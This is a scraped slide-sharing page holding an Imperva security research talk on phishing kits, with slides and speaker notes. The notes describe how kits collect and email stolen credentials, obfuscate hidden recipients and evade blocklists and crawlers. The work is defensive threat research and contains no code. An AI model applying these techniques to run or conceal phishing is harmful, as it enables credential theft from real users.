SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet Sophistication
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made Easy
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense Report
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall Webinar
 
More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.
 
Protect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudProtect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public Cloud
 

Último

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

Research: From zero to phishing in 60 seconds

  • 1. © 2017 Imperva, Inc. All rights reserved. From Zero to Phishing in 60 Seconds Luda Lazar, Imperva Research Team June 2017
  • 2. © 2017 Imperva, Inc. All rights reserved. Introduction 1 2
  • 3. © 2017 Imperva, Inc. All rights reserved. Introduction & Goals • How to setup a phishing campaign in 60 seconds? • Phishing kits examples and their main capabilities • Statistical analysis • Clustering analysis 3
  • 4. © 2017 Imperva, Inc. All rights reserved. How to Setup a Phishing Campaign in 60 Seconds? 4 Spam Service / [SMTP] Server Email List Compromised Server or Hosting ServicesPhishing Pages
  • 5. © 2017 Imperva, Inc. All rights reserved. Phishing Attack 5 2. Send phishing email Phishing Site Attacker Victim 3. Visit phishing page 4. Send stolen credentials Email Account 5. Harvest new credentials
  • 6. © 2017 Imperva, Inc. All rights reserved. The Research from 20,000 feet 6 Conclusions Analyzing phishing kits Extracting features Obtaining phishing kits Phishing sites sources
  • 7. © 2017 Imperva, Inc. All rights reserved. Numbers • OpenPhish feed: – Total amount of phishing URLs: 8388 (after noise cleanup) – Total number of phishing kits: 591  7% • TechHelpList.com pastes (All URLs of last year): – Total amount of phishing URLs: 4463 – Total number of phishing kits: 428 DIY kits  9.6% • Total 1019 kits 7
  • 8. © 2017 Imperva, Inc. All rights reserved. Phishing Kits Examples 2 8
  • 9. © 2017 Imperva, Inc. All rights reserved. Phishing Kit Structure • Phishing kits contain two types of files: – Files needed to display a copy of the targeted web site (resources files) – Scripts used to save the phished information and send it to phishers 9
  • 10. © 2017 Imperva, Inc. All rights reserved. Google Docs Phishing Kit 10
  • 11. © 2017 Imperva, Inc. All rights reserved. Phishing Processing Code 11
  • 12. © 2017 Imperva, Inc. All rights reserved. Phishing Kit Capabilities 3 12
  • 13. © 2017 Imperva, Inc. All rights reserved. Drop Mechanisms of Phishing Kits • 98% of kits use email to send data to the attackers • 2% of kits save collected data on the server in log file (in a one kit the result stored in DB) 13 Remote, 98% Local, 2%
  • 14. © 2017 Imperva, Inc. All rights reserved. Implicit Recipients • About 25% of DIY kits contains hidden drops, secretly sending emails with the phished information to addresses different than the intended ones – Address Obfuscation – Repeated mail statements 14
  • 15. © 2017 Imperva, Inc. All rights reserved. Extending the Lifespan - Block Unwanted Access • 17% of DIY kits contain techniques to block unwanted access to them • Focused on avoiding detection by security companies and index services – htaccess – robots.txt – PHP scripts 15
  • 16. © 2017 Imperva, Inc. All rights reserved. Extending the Lifespan - Blacklist Evasion • Randomize URL per visitor – Creates a random phishing kit subdirectory – Copies the content of the entire kit inside it – Redirects the visitor to the newly generated random location 16
  • 17. © 2017 Imperva, Inc. All rights reserved. Clustering Analysis 4 17
  • 18. © 2017 Imperva, Inc. All rights reserved. Research Method • Features characterize phishing kit • Statistical analysis • Clustering: – Files list (metadata of DIY archive) – Author’s signature (results processing file) – Subject (results email) – Sender (results email ‘from’ header) • Every cluster of kits has at least one of the features in common Confidential18
  • 19. © 2017 Imperva, Inc. All rights reserved. Clustering Results • Total number of clusters: 230 – 19 clusters (size of each cluster => 10), covering 541 kits (53% of data) – 48 clusters (size of each cluster => 5), covering 731 kits (72% of data) – 118 clusters (size of each cluster => 2), covering 907 kits (89% of data) • Similarity statistics: – 14% of the kits have four identical features – 39% of the kits have at least three identical features – 56% of the kits have at least two identical features 19
  • 20. © 2017 Imperva, Inc. All rights reserved. Phishing Kits Graph 20
  • 21. © 2017 Imperva, Inc. All rights reserved. Author Signature Total number of authors signatures: 271 • 32% of kits didn’t contain author’s signature • 17% of kits signed with a unique signature • 51% of kits signed with a not unique signature 21
  • 22. © 2017 Imperva, Inc. All rights reserved. Fud Tool Dot Com 22
  • 23. © 2017 Imperva, Inc. All rights reserved. Kits’ Buyers (Results Email Recipients) • Total number of buyers: 715 (distinct addresses) • 8% of buyers appear in at least three different kits (represent 23% of kits) • 24% of buyers appear in at least two different kits (represent 46% of kits) 23
  • 24. © 2017 Imperva, Inc. All rights reserved. Conclusions • Phishing is here to stay – It is still a significant and effective cyber threat – Phishing DIY kits are significant facilitator for this, lowering the cost and time it takes to mount a phishing campaign • Phishing ecosystem resembles legitimate economic ecosystems: – Role-based ecosystem with technology vendors and service providers – Phishers phish phishers: some players misbehave…. 24
  • 25. © 2017 Imperva, Inc. All rights reserved. More Info • Click here to subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends: https://www.imperva.com/blog/ Confidential25

Notas do Editor

  1. Slide 1 Hello, my name is Luda Lazar. I’ve been working at Imperva for 5.5 years. I’m a security researcher.
  2. Slide 2 Introduction
  3. Slide 3 Today I’m going to talk about phishing, particularly about how easy and quick is to setup a phishing scam. I will present examples for phishing kits and their main capabilities. I will show Statistical and Clustering analysis of our collection of phishing kits.
  4. Slide 4 So how to setup a phishing campaign in 60 seconds: To achieve this goal we will need the following components: Phishing pages Spam service/server - SMTP infrastructure: To send massive amounts of emails Email list for spamming - List of emails (cost depending on country, freshness and targets) Compromised servers to host the phishing pages or hosting services - The attacker needs access to compromised legitimate servers to remove the dependency on hosting services and host the phishing pages. Each of these components can be purchased in few second on the Russian black market. In previous research we focused on other components of the phishing, such as compromised servers. In the current research we focused on phishing kits to understand their main capabilities, where they come from and their effect on phishing market.
  5. Slide 5 How does a standard phishing attack, based on a phishing kit, look? First of all, the attacker buys a compromised server (or use a hosting services) and uploads a phishing kit to the server. Then, the attacker, using a spam service, sends a burst of phishing emails to the potential victims. The victims fall into the phishing trap by visiting the phishing pages and enter their credentials. Phishing kits perform processing to credentials and send them to an external email account.
  6. Slide 6 After we understand the basic flow of a phishing attack based on phishing kit, we will present the high level flow of our research. The first phase of project was to find a source for phishing sites: We used two different sources to gather phishing kits samples: OpenPhish Feed https://openphish.com/ for zero-day samples Pastes from TechHelpList.com for long-live phishing campaigns 2. The second phase was: We developed a kind of scraper, which gets a list of phishing URLs and retrieves phishing kits from the backend of the phishing server. For each URL, if phishing site is online and allowing directory listing, we generated list of paths and tried to locate and download phishing kit(s). 3. The third phase is definition and retrieval of the features from the phishing kits and normalization of the data. 4. The fourth stage includes statistical analysis of the extracted features and clustering. 5. The fifth stage results in conclusions based on the previous stage.
  7. Slide 7 From both sources we in total collected more than a thousand phishing kits. From Openphish we collected about six hundred samples which is 7% of all checked URLs. From the Pastes we collected more than four hundred kits which is almost 10% of all checked URLs. Limitations. The main threat to the validity of the statistics presented above is the problem of the “coverage” of the examined kits, i.e., the variety of the recovered kits.
  8. Slide 8 Now let’s discuss the structure of the phishing kits and show some examples, including a Google Docs phishing kit.
  9. Slide 9 The phishing kits contain two types of files: resource files which need to display a copy of the targeted web site, and processing scripts which are used to save the phished information and send it to the phishers.
  10. Slide 10 The following is an example of a common Google Docs phishing kit, which is about 15 percent of our collection. The resource files contain Google figures and CSS password validation files. The PHP files are processing files which store and send the stolen information to the attacker. The majority of phishing kits contain all the resources required to replicate the targeted web site, including HTML pages, JavaScript and CSS files, images and other media files. This minimizes the number of requests the kit issues to the legitimate site and, thus, the chances of being detected if the target site analyzes incoming requests. However, a significant part of kits contain links to the target web sites.
  11. Slide 11 The following is the processing code of the Google Docs kit. The first part checks which email provider was selected by the victim (Gmail, Yahoo, Hotmail, AOL or other). Then it retrieves victims’ details such as Browser, IP address and using the IP address resolves the geolocation of the victim. The next part is the building of the phishing results email message. It’s interesting that the processing code is signed by attacker ‘NoBody.’ The phishing message contains: Email provider Email and password of the victim IP address Geolocation (city, region, country and country code) The results message is exfiltrated in two ways, it’s written to file and sent to the attackers’ email address. If the email provider is Gmail, the victim will be redirected to the next page (verification.php) which will lure the victim to enter his recovery email or phone number which is required by Google to authenticate from an unrecognized device. The last part is redirecting the victim to the legitimate landing page of Google Drive.
  12. Slide 12 Following the example of Google Docs phishing kits, we can now talk about the main capabilities of the phishing kits.
  13. Slide 13 One of the main functions of phishing kits is to automatically send phished information to the attackers. The vast majority, ninety eight percent, of kits use email accounts to send data to the attackers. 2 percent save directly the collected information on the server.
  14. Slide 14 But what happens when buying from a thief? About of 25 percent of kits contains an implicit recipient which receive emails with the phishing results as well as the intended recipients. We saw multiple techniques to hide the authors’ email addresses, but the popular few are address obfuscation and repeated mail statements. More info: For obfuscation of emails kits writers use a variety of techniques, ranging from standard encoding and compression algorithms to simple, custom cryptographic methods. Base64-encoding is a popular obfuscation choice. The email address is encoded using its base64 representation and the built-in base64_decode() function is used to retrieve its original value. Another commonly-used encoding is ASCII. In this case, the address is obfuscated by substituting each character with the corresponding ASCII value, typically in hexadecimal format. A function mapping a value to the corresponding character (e.g., the built-in pack() function) is then used to recover the email address. Among custom techniques, obfuscations based on Caesar ciphers are popular. Each letter of the email address is replaced with the letter that is some fixed number of positions further down in the alphabet. Another common technique is the use of simple permutations.
  15. Slide 15 We have also seen how attackers are trying to implement techniques to block unwanted access to their phishing kits, as they may want to prevent Google, Yahoo, or security company bots from finding them. Some of the techniques include: .htaccess files with a list of blocked IP addresses related to bots from search engines and security companies. robots.txt files that are used to prevent search engine or security company bots from accessing specific remote directories. PHP scripts that dynamically check if the remote IP address is allowed to access the phishing pages. These scripts are often included as part of the phishing kit. 17% of deployment kits contain techniques to block unwanted access to their phishing kits in order to avoid detection by security companies and index services.
  16. Slide 16 The next technique is black list evasion which is based on redirecting each new victim to a newly generated random location.
  17. Slide 17 The last part of the presentation contains our similarity analysis of the phishing kits.
  18. Slide 18 Firstly, let’s describe our research method. We extracted features that characterize phishing kits We made statistics on certain features of phishing kits Then we performed unsupervised machine learning on the extracted features The features we chose: Files list (metadata of phishing archive) Author’s signature (results processing file) Subject (results email) Sender (results email ‘from’ header) We perform clustering of data, when every cluster of kits has at least one of the features in common: Extracting features that characterize phishing kit Cleanup and normalizing features’ data Clustering of data when every cluster of kits has at least one of the features in common
  19. Slide 19 The clustering results: We got in total 230 clusters 19 big clusters (with at least 10 kits in each cluster) covering 53 percent of the data 48 clusters (with at least 5 kits in each cluster) covering 73 percent of the data 118 clusters (with at least 2 kits in each cluster) covering 89 percent of the data 14% of the kits have four identical features 39% of the kits have at least three identical features 56% of the kits have at least two identical features 14% of the kits have four identical features 25% of the kits have three identical features 16% of the kits have two identical features
  20. Slide 20 Biggest Cluster: 153 Second: 78 Third:66 Fourth: 27 Fifth: 24 Sixth : 20 …..
  21. Slide 21 The following are general statistics on the author feature.
  22. Slide 22 We searched for one of the popular signatures and found a few interesting sites.
  23. Slide 23 The following are general statistics on the buyers feature: 8% of buyers appear in at least three different kits (represent 23% of kits) 24% of buyers appear in at least two different kits (represent 46% of kits)
  24. Slide 24 In conclusion, kits’ authors minimize the effort and risks associated with deploying the phishing site and attracting victims, and maximize their return on investment by harvesting the work of unaware users.
  25. Slide 25 Click here to subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends: https://www.imperva.com/blog/